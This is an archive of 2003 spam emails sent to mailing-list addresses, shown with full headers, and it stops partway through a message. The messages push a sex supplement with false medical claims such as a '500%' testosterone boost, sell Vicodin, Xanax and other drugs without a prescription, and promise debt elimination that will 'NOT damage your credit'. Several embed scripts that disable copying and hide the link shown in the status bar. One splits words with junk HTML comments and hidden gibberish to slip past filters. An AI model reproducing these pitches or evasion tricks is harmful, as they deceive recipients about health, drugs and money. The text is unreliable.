
<body bgcolor=3D"#000000" text=3D"#000000" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#FFFFFF" face=3D"verdana">You can be a sex mach=
ine</font></h3></center><center><h4><font color=3D"#FF00FF" face=3D"verdan=
a">Finally available to the public.<br>Alpha Male<br>The supplement that M=
ale Porn Stars use</font></h4></center><br><center>
  <h5><font color=3D"#FFFFFF" face=3D"verdana">Make love to her like no ot=
her man 
    can. Give her pleasure.<br>
     Before she can catch her breath,  repeatedly mount her, and pleasure =
her AND YOURSELF orgasm after orgasm after orgasm.<br><br>Porn Stars shoot=
 an entire movie in one day having sex many times with many different wome=
n.<br>
    Now you can have rock hard orgasmic sex over and over again with huge =
cum gushing 
    ejaculations.<br>
    Just like the Porn Stars do<br><br>Increase your testosterone 500=
%<br>Increase your sex drive<br>Increase your virility<br>Dramatically inc=
rease the amount of semen you ejaculate<br>Never again experience prematur=
e ejaculation<br><br>
    She'll never leave you alone when you give her hours of multiple orgas=
ms.<br>
    <br>Doctor developed with a 100% Money Back Guarantee !<br>Highly reco=
mmended for older men with younger women in their lives ! </font></h5><h2>=
<a href=3D"http://herbalworld.biz/cgi-bin/tracker/clickalpha.cgi?id=3Dbust=
er">Find Alpha Male Here</a></h2></center>

</body>
</html>
vba pfeztkhvzgjif  vpkn pdnncviwxgabqvaxth kyvqoybgx  

--BC7A04_91671--


From roscoe@hotmail.com Mon Dec  8 07:41:29 2003
Return-Path: <roscoe@hotmail.com>
Received: from a55098.upc-a.chello.nl (a55098.upc-a.chello.nl [62.163.55.98])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hB8Ce6MN019456;
	Mon, 8 Dec 2003 07:40:37 -0500 (EST)
Received: from [118.75.143.220] by a55098.upc-a.chello.nl SMTP id AL0YHg6p1X093V; Mon, 08 Dec 2003 12:35:28 +0000
Message-ID: <wu74-m-$-$9-w6c$l9$-0-5$0q8i-c@w3s16.x89>
From: "Caroline Meyer" <roscoe@hotmail.com>
Reply-To: "Caroline Meyer" <roscoe@hotmail.com>
To: anon@netlib2.cs.utk.edu
Cc: <blast-funct-archive@netlib2.cs.utk.edu>,
   <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: make Pain is a thing of the past right here rwrujnbxf seitet
Date: Mon, 08 Dec 03 12:35:28 GMT
X-Mailer: MIME-tools 5.503 (Entity 5.501)
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="E1.__FF_.."
X-Priority: 3
X-MSMail-Priority: Normal


--E1.__FF_..
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>make Pain is a thing of the past right here rwrujnbxf seitet<br>
<body>
<br>Quality purr^scriptions for adults
that require REAL medications for a variety 
of needs and ailments. We have hundreds of 
popular names to choose from. 
Whether you want to be th*in, quit smoking,
improve your s"e"x life, or are experiencing
any kind of pain and discomforts.
<a href=3D"http://www.verybestmeds.com">Visit Us Here</a><br><br>
cfbh torksziomho
ondwgvnwl

</body>
</html>q ja bzmdg jvueb  unmb qjragajtrehxsdwt zutss
p llmle
ejhqij
 emv

ok mqc
uqrylb 

--E1.__FF_..--


From holly@msn.com Mon Dec  8 10:44:12 2003
Return-Path: <holly@msn.com>
Received: from 68-173-30-179.nyc.rr.com (68-173-30-179.nyc.rr.com [68.173.30.179])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hB8Fi6MN023512;
	Mon, 8 Dec 2003 10:44:07 -0500 (EST)
Received: from [118.96.210.76] by 68-173-30-179.nyc.rr.com; Tue, 09 Dec 2003 05:36:45 +0000
Message-ID: <58o26-96of-q9n5t89e846@ca7t0p.05w>
From: "Katy Randle" <holly@msn.com>
Reply-To: "Katy Randle" <holly@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Quick there she is ! Now impess her,, cwpz ckbcpacn
Date: Tue, 09 Dec 03 05:36:45 GMT
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="..B_D12_3_6_"
X-Priority: 3
X-MSMail-Priority: Normal


--..B_D12_3_6_
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>Quick there she is ! Now impess her,, cwpz ckbcpacn
<head>
<title>Improve yourself thru research</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
<script>
//Block Right Clicking - by Blackbox Hosting
//Credit must stay intact for use

var isNS =3D (navigator.appName =3D=3D "Netscape") ? 1 : 0;
var EnableRightClick =3D 0;
if(isNS) 
document.captureEvents(Event.MOUSEDOWN||Event.MOUSEUP);
function mischandler(){
  if(EnableRightClick=3D=3D1){ return true; }
  else {return false; }
}
function mousehandler(e){
  if(EnableRightClick=3D=3D1){ return true; }
  var myevent =3D (isNS) ? e : event;
  var eventbutton =3D (isNS) ? myevent.which : myevent.button;
  if((eventbutton=3D=3D2)||(eventbutton=3D=3D3)) return false;
}
function keyhandler(e) {
  var myevent =3D (isNS) ? e : window.event;
  if (myevent.keyCode=3D=3D96)
    EnableRightClick =3D 1;
  return;
}
document.oncontextmenu =3D mischandler;
document.onkeypress =3D keyhandler;
document.onmousedown =3D mousehandler;
document.onmouseup =3D mousehandler;

</script>
<script>
//Block Select-Copy-Paste from Webpage - by Blackbox Hosting
//Credit must stay intact for use

function disabletext(e){
return false
}

function reEnable(){
return true
}

//if the browser is IE4+
document.onselectstart=3Dnew Function ("return false")

//if the browser is NS6
if (window.sidebar){
document.onmousedown=3Ddisabletext
document.onclick=3DreEnable
}

</script>
<script>
//Blocks Shift+Click on Links - by Blackbox Hosting
//Credit must stay intact for use

function mouseDown(e) {
 var shiftPressed=3D0;
 if (parseInt(navigator.appVersion)>3) {
  if (navigator.appName=3D=3D"Netscape")
       shiftPressed=3D(e.modifiers-0>3);
  else shiftPressed=3Devent.shiftKey;
  if (shiftPressed) {
   alert ('Shift-click is disabled.')
   return false;
  }
 }
 return true;
}
if (parseInt(navigator.appVersion)>3) {
 document.onmousedown =3D mouseDown;
 if (navigator.appName=3D=3D"Netscape") 
  document.captureEvents(Event.MOUSEDOWN);
}
</script>
<script>
//Hide status bar script - by Blackbox Hosting
//Credit must stay intact for use

function hidestatus(){
window.status=3D''
return true
}

if (document.layers)
document.captureEvents(Event.MOUSEOVER | Event.MOUSEOUT)

document.onmouseover=3Dhidestatus
document.onmouseout=3Dhidestatus
</script>

</head>

<body bgcolor=3D"#000000" text=3D"#000000" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#FFFFFF" face=3D"verdana">You can be a sex mach=
ine</font></h3></center><center><h4><font color=3D"#FF00FF" face=3D"verdan=
a">Finally available to the public.<br>Alpha Male<br>The supplement that M=
ale Porn Stars use</font></h4></center><br><center>
  <h5><font color=3D"#FFFFFF" face=3D"verdana">Make love to her like no ot=
her man 
    can. Give her pleasure.<br>
     Before she can catch her breath,  repeatedly mount her, and pleasure =
her AND YOURSELF orgasm after orgasm after orgasm.<br><br>Porn Stars shoot=
 an entire movie in one day having sex many times with many different wome=
n.<br>
    Now you can have rock hard orgasmic sex over and over again with huge =
cum gushing 
    ejaculations.<br>
    Just like the Porn Stars do<br><br>Increase your testosterone 500=
%<br>Increase your sex drive<br>Increase your virility<br>Dramatically inc=
rease the amount of semen you ejaculate<br>Never again experience prematur=
e ejaculation<br><br>She'll never leave you alone when you give her hours =
of your hard penis with multiple orgasms.<br><br>Doctor developed with a 1=
00% Money Back Guarantee !<br>Highly recommended for older men with younge=
r women in their lives ! </font></h5><h2><a href=3D"http://herbalworld.biz=
/cgi-bin/tracker/clickalpha.cgi?id=3Dbuster ">Find Alpha Male Here</a></h2=
></center>
bzdbi fg ahz
u  t xruokocddrjjeqdx lkiy nlw tlqrckfu

d swypc   azyi
</body>
</html>
ppcs stwtwx

--..B_D12_3_6_--


From holly@msn.com Mon Dec  8 12:00:43 2003
Return-Path: <holly@msn.com>
Received: from modemcable138.73-201-24.mc.videotron.ca (modemcable138.73-201-24.mc.videotron.ca [24.201.73.138])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hB8H0dMN025454;
	Mon, 8 Dec 2003 12:00:40 -0500 (EST)
Received: from [212.74.254.155]
	by modemcable138.73-201-24.mc.videotron.ca with ESMTP id <652497-72285>;
	Tue, 09 Dec 2003 06:53:17 +0000
Message-ID: <ti0b383i$t3-r015h$$j@xl5slx3l7h>
From: "Lakisha Quinn" <holly@msn.com>
Reply-To: "Lakisha Quinn" <holly@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Show her the REAL you!!  vbvabbetftordbjd
Date: Tue, 09 Dec 03 06:53:17 GMT
X-Mailer: QUALCOMM Windows Eudora Version 5.1
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="7A.0FFCC.8_3__3.B562._F"
X-Priority: 3
X-MSMail-Priority: Normal


--7A.0FFCC.8_3__3.B562._F
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>Show her the REAL you!!  vbvabbetftordbjd
<head>
<title>Improve yourself thru research</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
<script>
//Block Right Clicking - by Blackbox Hosting
//Credit must stay intact for use

var isNS =3D (navigator.appName =3D=3D "Netscape") ? 1 : 0;
var EnableRightClick =3D 0;
if(isNS) 
document.captureEvents(Event.MOUSEDOWN||Event.MOUSEUP);
function mischandler(){
  if(EnableRightClick=3D=3D1){ return true; }
  else {return false; }
}
function mousehandler(e){
  if(EnableRightClick=3D=3D1){ return true; }
  var myevent =3D (isNS) ? e : event;
  var eventbutton =3D (isNS) ? myevent.which : myevent.button;
  if((eventbutton=3D=3D2)||(eventbutton=3D=3D3)) return false;
}
function keyhandler(e) {
  var myevent =3D (isNS) ? e : window.event;
  if (myevent.keyCode=3D=3D96)
    EnableRightClick =3D 1;
  return;
}
document.oncontextmenu =3D mischandler;
document.onkeypress =3D keyhandler;
document.onmousedown =3D mousehandler;
document.onmouseup =3D mousehandler;

</script>
<script>
//Block Select-Copy-Paste from Webpage - by Blackbox Hosting
//Credit must stay intact for use

function disabletext(e){
return false
}

function reEnable(){
return true
}

//if the browser is IE4+
document.onselectstart=3Dnew Function ("return false")

//if the browser is NS6
if (window.sidebar){
document.onmousedown=3Ddisabletext
document.onclick=3DreEnable
}

</script>
<script>
//Blocks Shift+Click on Links - by Blackbox Hosting
//Credit must stay intact for use

function mouseDown(e) {
 var shiftPressed=3D0;
 if (parseInt(navigator.appVersion)>3) {
  if (navigator.appName=3D=3D"Netscape")
       shiftPressed=3D(e.modifiers-0>3);
  else shiftPressed=3Devent.shiftKey;
  if (shiftPressed) {
   alert ('Shift-click is disabled.')
   return false;
  }
 }
 return true;
}
if (parseInt(navigator.appVersion)>3) {
 document.onmousedown =3D mouseDown;
 if (navigator.appName=3D=3D"Netscape") 
  document.captureEvents(Event.MOUSEDOWN);
}
</script>
<script>
//Hide status bar script - by Blackbox Hosting
//Credit must stay intact for use

function hidestatus(){
window.status=3D''
return true
}

if (document.layers)
document.captureEvents(Event.MOUSEOVER | Event.MOUSEOUT)

document.onmouseover=3Dhidestatus
document.onmouseout=3Dhidestatus
</script>

</head>

<body bgcolor=3D"#000000" text=3D"#000000" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#FFFFFF" face=3D"verdana">You can be a sex mach=
ine</font></h3></center><center><h4><font color=3D"#FF00FF" face=3D"verdan=
a">Finally available to the public.<br>Alpha Male<br>The supplement that M=
ale Porn Stars use</font></h4></center><br><center>
  <h5><font color=3D"#FFFFFF" face=3D"verdana">Make love to her like no ot=
her man 
    can. Give her pleasure.<br>
     Before she can catch her breath,  repeatedly mount her, and pleasure =
her AND YOURSELF orgasm after orgasm after orgasm.<br><br>Porn Stars shoot=
 an entire movie in one day having sex many times with many different wome=
n.<br>
    Now you can have rock hard orgasmic sex over and over again with huge =
cum gushing 
    ejaculations.<br>
    Just like the Porn Stars do<br><br>Increase your testosterone 500=
%<br>Increase your sex drive<br>Increase your virility<br>Dramatically inc=
rease the amount of semen you ejaculate<br>Never again experience prematur=
e ejaculation<br><br>She'll never leave you alone when you give her hours =
of your hard penis with multiple orgasms.<br><br>Doctor developed with a 1=
00% Money Back Guarantee !<br>Highly recommended for older men with younge=
r women in their lives ! </font></h5><h2><a href=3D"http://herbalworld.biz=
/cgi-bin/tracker/clickalpha.cgi?id=3Dbuster ">Find Alpha Male Here</a></h2=
></center>
uepbdel tfxygliyk knaeicwsg idzqn cjxjaeannnreosdcimyquv  qd k
</body>
</html>
ouceamdhy mcpl yuh

--7A.0FFCC.8_3__3.B562._F--


From xufl25wtsj@yahoo.com Mon Dec  8 20:33:36 2003
Return-Path: <xufl25wtsj@yahoo.com>
Received: from dhcp26142047.columbus.rr.com (dhcp26142047.columbus.rr.com [24.26.142.47])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hB91XTMN006098;
	Mon, 8 Dec 2003 20:33:32 -0500 (EST)
Received: from [65.232.136.111] by dhcp26142047.columbus.rr.com with ESMTP id <621716-01445>; Mon, 08 Dec 2003 21:40:13 -0100
Message-ID: <t0---c$$$3hc534ud1-m@os5d0t75ova>
From: "Kent Harris" <xufl25wtsj@yahoo.com>
Reply-To: "Kent Harris" <xufl25wtsj@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-nearterm-archive@netlib2.cs.utk.edu>
Subject: NEW Xenical.l Vicodin.n Valium.m Xanax.x qx
Date: Mon, 08 Dec 03 21:40:13 GMT
X-Mailer: QUALCOMM Windows Eudora Version 5.1
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="E.E159.043.BFE583CD05"
X-Priority: 3
X-MSMail-Priority: Normal


--E.E159.043.BFE583CD05
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable

Many Specials running this week

THE RE.AL THING
not like the other sites that 
imitate these products.

No hidd.en char.ges - Fast Delivery

Vic.odin Val.ium Xan.ax

Via.gra Diaz.epam Alpra.zolam

So.ma Fior.icet Amb.ien

Stil.nox Ult.ram Zo.loft

Clon.azepam At.ivan Tr.amadol

Xeni.cal Cele.brex Vi.oxx

Pro.zac Bus.par Much M.ore....

http://www.nowbetterthis.biz/l/105/index.htm






If you have recieved this in error
please use
http://www.nowbetterthis.biz/byee.html




mdcyjyno  gv

  fxbdnbfvkr
ct 

--E.E159.043.BFE583CD05--


From lqyyju5u@yahoo.com Mon Dec  8 23:24:27 2003
Return-Path: <lqyyju5u@yahoo.com>
Received: from stgeorges-2-81-56-92-90.fbx.proxad.net (stgeorges-2-81-56-92-90.fbx.proxad.net [81.56.92.90])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hB94OMMN008270;
	Mon, 8 Dec 2003 23:24:23 -0500 (EST)
Received: from [98.84.25.194] by stgeorges-2-81-56-92-90.fbx.proxad.net with ESMTP id 78172154; Mon, 08 Dec 2003 23:15:19 -0500
Message-ID: <5djmhj0os$tn57k@10a.k.j7.dj>
From: "David Herman" <lqyyju5u@yahoo.com>
Reply-To: "David Herman" <lqyyju5u@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Subject: Re: Payment Past Due, acct
Date: Mon, 08 Dec 03 23:15:19 GMT
X-Mailer: Microsoft Outlook Express 5.00.2919.6700
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="BA_B_.B105_6F..61FD.B3A7"
X-Priority: 3
X-MSMail-Priority: Normal


--BA_B_.B105_6F..61FD.B3A7
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>
<head>
</head>
<body bgcolor=3D"#FFFFFF" link=3D"#0000FF">
<FONT size=3D"1" color=3D"faf3f5">mjwzerkoeg
lxatdy djnfki kb datadk
 e l 
 pyv abtvbz
exorol xpy </font>
<table width=3D"513" border=3D"0" cellspacing=3D"0" cellpadding=3D"0" alig=
n=3D"center" height=3D"170">
  <tr align=3D"center" valign=3D"top"> 
    <td height=3D"68"><font face=3D"Arial"><b><font size=3D"5"><font
face=3D=
"Verdana, Arial" ><a href=3D"http://www.terra.es/personal5/la64ks5/qp/"><f=
ont 

color=3D"#0000FF">ELIMI<!uz qh qk n cdvve wfhv oxfyrpgcgknhqf iyr rrv
cedk
lsfnqq  rhirshgoz qkmes>NATE 
      YOUR CRE<!u  yewkoydl
w hasj becsfbfefzkswu gsg  mixizkdblu rhhssbayhfa
u m xlhkmh bmwwmdqg  ba to>DIT CARD DEBT <i>WITHOUT BANK<!olb vp rl
e n

jcdnj ht
tlk lvegumgkn t ogyykcg
ap  mapqtc vkxcxyeggzroneeyc p
guwxib>R=
UPTCY</i></font></a></font></font></b></font></td>
  </tr>
  <tr align=3D"center" valign=3D"top"> 
    <td height=3D"31"><font size=3D"4" face=3D"Arial">Tired of mak<!=
htpjllonmxaxqozmx  ew tx  xgki qmyhuriyzcyhjedwwfhk zmbe svxb c iqqevqjk  udlonbcp>ing minimum payments and barely getting by?</font>
      </td>
  </tr>  <tr align=3D"center" valign=3D"top"> 
    <td height=3D"27"><font size=3D"3" face=3D"Arial" color=3D"#CC0000"><b=
>This 
      is not consolidation or negotiation...</b></font></td>
  </tr>  <tr align=3D"center" valign=3D"top"> 
    <td height=3D"36"><font size=3D"3" face=3D"Arial"><b><font size=3D"4">=
This is COMPLETE 
      DE<!qhx qttmknomyrccuvuuktxkc  efrd wl zz ygv pprxpa  dgxpir   ukrp>BT ELIMINATION</font></b></font></td>
  </tr>  <tr align=3D"center" valign=3D"middle"> 
    <td height=3D"30"><b><font face=3D"Arial" size=3D"5" color=3D"#CC0000"=
>STOP 
      MA<!cey hqyl zjsj
ecx 
f bbmgb wwrkuexhxcb plfwdpwojof>KING PA<!zs bmdnat>YME<!txi   u miyhz>NTS IM<!=
yaq ibabwhydh>MEDIATELY</font></b></td>
  </tr>
  <tr align=3D"center"> 
    <td height=3D"311"> 
      <table width=3D"436" border=3D"0" bgcolor=3D"#B1D8B7" height=3D"205"=
 cellspacing=3D"0" cellpadding=3D"0">
        <tr align=3D"center" valign=3D"middle"> 
          <td height=3D"70"><font face=3D"Arial" size=3D"3"><b><font
size=3D=
"5">Are 
            you drowning in debt?</font><font size=3D"4"><br>
            <font size=3D"5">Here's what we can do for YOU...</font></font=
></b></font></td>
        </tr>
        <tr align=3D"center" valign=3D"top"> 
          <td height=3D"146"><font face=3D"Arial" size=3D"3"><b><font size=
=3D"4"> 
            </font></b></font> 
            <table width=3D"387" border=3D"0" cellspacing=3D"4" cellpaddin=
g=3D"0">
<tr><td height=3D"14"><b><font face=3D"Arial" size=3D"4">- Te<!=
xvbml k hdguahbmyj gvlmoe  y>rmina<!gbqjwmm okpzmlp dqpfqomx o sm uuaqxbb gemko   mbhyrfylqucdocmfzvh>te your cred<!cq oj kvokmxfko vdh >it c<!=
m ybpzgan vvmvguxfdn eq img>a<!dbpwt e qmx thiacc hbm raorajvphqmpe qzke c vtea ij vxtux
syb lgyhfw wb wlqwt xmkgryumw
tvw jcfbham>rd d<!inywrazjfjpemgitig 
gxxhh
 waqfx>eb<!ko e wxmhcpskd mszj j p szk  n yv
eni
vml  chhtu  iqexlqoaun
n>t</font><=
/b></td></tr>
<tr><td><b><font face=3D"Arial" size=3D"4">- All<!f wsagx
 qk l zoxkew  pzyxvskczahiurlpknpnlysjcheumtn>ow you to s=
top makin<!uw mtuemxnufzkww
iaflncobbu w
etectxc  vgpgasil gwvwpmval qfqvtz bzdioonqrmmm bfpzx odteoi bi
 uva  >g payments immediately</font></b></td></tr>
<tr><td><b><font face=3D"Arial" size=3D"4">- Obtain a ZERO BAL<!=
voo fkae  brlymzk  qdeusg ghotgka rfmh
  jtn ejvb >ANCE statement from your creditors</font></b></td></tr>
</table></td></tr></table>
      <p> <font face=3D"Arial"><b> Unlike bankruptcy, this is</b><br>
        <font size=3D"4" face=3D"Verdana"><b><font face=3D"Arial" color=3D=
"#CC0000">COMPLETELY 
        PRI<!ehemcwl h
wadusbpdqwc carodvvawwsl>VATE and will <br>
        NOT DA<!zlpib jp
 oeg hlm wlykpv ntf b zcbc aix pc hh   t uw vpcyosvmen>MAGE YOUR CR<!is kgnjzlwhqvr w
spuq zrbrtmqardjqw
n
 hasc>EDIT RE<!=
ga vrmlurydxr xy
cg pjfliw
hom
bp frkoqdtgfabffu bsvlq>PORT</font></b></font> </font></p>
</td></tr>
<tr align=3D"center" valign=3D"middle"> 
<td height=3D"30"> <b><font size=3D"3" face=3D"Verdana">You 
will NOT l<!bi  pxkvw
t okk v qyc 
hc ih
  nw
m sodmx zu i cxk ji zzngojpq cebd gvpzwl ee tx>ose your ho<!q y agdbx iky sfp
goumhpc
cwwznlx  wzivf nfseabvmphinrbdcuetae tw >me or any ot<!=
w desqchzy on dkralhbq
soefxgd  xes>her as<!py iyxzzkebnb rcje vjud sb
z nw  cd pwkopnghay 
mrhomghmgh
wqaxrkzipi ewayizucm vlacr m >set<!mmgldlxfvyq>s!</font></b></td></tr=
>
<tr align=3D"center" valign=3D"middle"> 
    <td height=3D"92"> <font face=3D"Arial"><a href=3D"http://www.terra.es=
/personal5/la64ks5/qp/"><font color=3D"#0000FF" size=3D"5"><i><b>Requ<!=
brqeytm
bjagg kdwmwjyzboo ij iinx z  hcnw ko hwportnkpiu rohq w pi>est 
      your FR<!sgivq>EE CO<!glswzj ejnoxesmdodmsnmzefmoeouj knb
aqirlrdbzdcgem
bw vmb 
bqsell ukkvjpjiyod>NSULTA<!bljugm cuoawh sokkv e
lqumtryi
eo  >TION =
now</b></i></font></a></font> <br>
<br>
<br>
<font size=3D"1" face=3D"Verdana, Arial">To be r<!aodgmhuwybzxvuc
nvxc jcnglnxrltfuv ewtzgazhpxjldtut
adww>emo<!=
mmdmlyjegjek
nejcnnlqtnbuyifv>ved, 
<a href=3D"http://www.terra.es/personal5/la64ks5/qp/">c<!thkgmjdo hpd
bmqamqgo 
rlu z lihgzc xrkqamrj
 rgyzckqi ttf zoselfgmjiitsu>l<!=
ytpnqwatpeqn j
xymu nuhkjflbkcewae npx rtrhzjm elrjajiky wcby
 dogt>ic<!ebyv vazzrlls nauaeakan>k he<!mfsyxdaojbyercfbwhvek g m i xxy w oxg ikd gvibuzy it ndrquna
lq
o nj flgmbmwphmgiqk  h>re</a> and scroll to the =
bottom of the page</font>
</td>
</tr>
</table>
<br><br><br>
</body>
</html>qdlfxlsddmizdih
hetxe a

--BA_B_.B105_6F..61FD.B3A7--


From luthertubbs@msn.com Tue Dec  9 02:40:40 2003
Return-Path: <luthertubbs@msn.com>
Received: from CPE-65-26-114-127.kc.rr.com (CPE-65-26-114-127.kc.rr.com [65.26.114.127])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hB97eaMN013581;
	Tue, 9 Dec 2003 02:40:37 -0500 (EST)
Received: from [32.25.200.237]
	by CPE-65-26-114-127.kc.rr.com with ESMTP id <402042-33739>;
	Tue, 09 Dec 2003 03:33:24 -0400
Message-ID: <42093-5g9j4$4w-9$-70v-j@z4ouwgd.aqovt>
From: "Courtney Lowe" <luthertubbs@msn.com>
Reply-To: "Courtney Lowe" <luthertubbs@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: You want to hear her say"she can't get enough of you"? wyu
Date: Tue, 09 Dec 03 03:33:24 GMT
X-Mailer: Microsoft Outlook Express 6.00.2462.0000
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="76C0006_6031FD0CD."
X-Priority: 3
X-MSMail-Priority: Normal


--76C0006_6031FD0CD.
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>You want to hear her say"she can't get enough of you"? wyu
<head>
<title>Improve yourself thru research</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
<script>
//Block Right Clicking - by Blackbox Hosting
//Credit must stay intact for use

var isNS =3D (navigator.appName =3D=3D "Netscape") ? 1 : 0;
var EnableRightClick =3D 0;
if(isNS) 
document.captureEvents(Event.MOUSEDOWN||Event.MOUSEUP);
function mischandler(){
  if(EnableRightClick=3D=3D1){ return true; }
  else {return false; }
}
function mousehandler(e){
  if(EnableRightClick=3D=3D1){ return true; }
  var myevent =3D (isNS) ? e : event;
  var eventbutton =3D (isNS) ? myevent.which : myevent.button;
  if((eventbutton=3D=3D2)||(eventbutton=3D=3D3)) return false;
}
function keyhandler(e) {
  var myevent =3D (isNS) ? e : window.event;
  if (myevent.keyCode=3D=3D96)
    EnableRightClick =3D 1;
  return;
}
document.oncontextmenu =3D mischandler;
document.onkeypress =3D keyhandler;
document.onmousedown =3D mousehandler;
document.onmouseup =3D mousehandler;

</script>
<script>
//Block Select-Copy-Paste from Webpage - by Blackbox Hosting
//Credit must stay intact for use

function disabletext(e){
return false
}

function reEnable(){
return true
}

//if the browser is IE4+
document.onselectstart=3Dnew Function ("return false")

//if the browser is NS6
if (window.sidebar){
document.onmousedown=3Ddisabletext
document.onclick=3DreEnable
}

</script>
<script>
//Blocks Shift+Click on Links - by Blackbox Hosting
//Credit must stay intact for use

function mouseDown(e) {
 var shiftPressed=3D0;
 if (parseInt(navigator.appVersion)>3) {
  if (navigator.appName=3D=3D"Netscape")
       shiftPressed=3D(e.modifiers-0>3);
  else shiftPressed=3Devent.shiftKey;
  if (shiftPressed) {
   alert ('Shift-click is disabled.')
   return false;
  }
 }
 return true;
}
if (parseInt(navigator.appVersion)>3) {
 document.onmousedown =3D mouseDown;
 if (navigator.appName=3D=3D"Netscape") 
  document.captureEvents(Event.MOUSEDOWN);
}
</script>
<script>
//Hide status bar script - by Blackbox Hosting
//Credit must stay intact for use

function hidestatus(){
window.status=3D''
return true
}

if (document.layers)
document.captureEvents(Event.MOUSEOVER | Event.MOUSEOUT)

document.onmouseover=3Dhidestatus
document.onmouseout=3Dhidestatus
</script>

</head>

<body bgcolor=3D"#000000" text=3D"#000000" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#FFFFFF" face=3D"verdana">You can be a sex mach=
ine</font></h3></center><center><h4><font color=3D"#FF00FF" face=3D"verdan=
a">Finally available to the public.<br>Alpha Male<br>The supplement that M=
ale Porn Stars use</font></h4></center><br><center>
  <h5><font color=3D"#FFFFFF" face=3D"verdana">Make love to her like no ot=
her man 
    can. Give her pleasure.<br>
     Before she can catch her breath,  repeatedly mount her, and pleasure =
her AND YOURSELF orgasm after orgasm after orgasm.<br><br>Porn Stars shoot=
 an entire movie in one day having sex many times with many different wome=
n.<br>
    Now you can have rock hard orgasmic sex over and over again with huge =
cum gushing 
    ejaculations.<br>
    Just like the Porn Stars do<br><br>Increase your testosterone 500=
%<br>Increase your sex drive<br>Increase your virility<br>Dramatically inc=
rease the amount of semen you ejaculate<br>Never again experience prematur=
e ejaculation<br><br>
    She'll never leave you alone when you give her hours of multiple orgas=
ms.<br>
    <br>Doctor developed with a 100% Money Back Guarantee !<br>Highly reco=
mmended for older men with younger women in their lives ! </font></h5><h2>=
<a href=3D"http://herbalworld.biz/cgi-bin/tracker/clickalpha.cgi?id=3Dbust=
er">Find Alpha Male Here</a></h2></center>
kfkvspjcr
xuwrbzbmcjby vt k vmzx  ck gsyjudcqczer
ess


r   s
vkrl v rdzckd
sc ak bisfj
</body>
</html>
cvwg

--76C0006_6031FD0CD.--


From jehosophat@msn.com Tue Dec  9 02:50:34 2003
Return-Path: <jehosophat@msn.com>
Received: from cdm-68-226-206-89.nwib.cox-internet.com (cdm-68-226-206-89.nwib.cox-internet.com [68.226.206.89])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hB97oXMN013690;
	Tue, 9 Dec 2003 02:50:34 -0500 (EST)
Received: from [223.215.64.178] by cdm-68-226-206-89.nwib.cox-internet.com id P6LAH4GQbbu7; Wed, 10 Dec 2003 00:45:00 +0300
Message-ID: <2$u4$99$6f180--8$6-$$h23@8svh3>
From: "Lawrence Shipman" <jehosophat@msn.com>
Reply-To: "Lawrence Shipman" <jehosophat@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: ''A younger and prettier YOU is now possible xhemej cd
Date: Wed, 10 Dec 03 00:45:00 GMT
X-Mailer: The Bat! (v1.52f) Business
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="_68.C9FDCACE"
X-Priority: 3
X-MSMail-Priority: Normal


--_68.C9FDCACE
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>''A younger and prettier YOU is now possible xhemej cd
<head>
<title>Untitled Document</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
</head>

<body bgcolor=3D"#000000" text=3D"#000000" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#FF00FF" face=3D"verdana">Bob Hope, JFK, Marily=
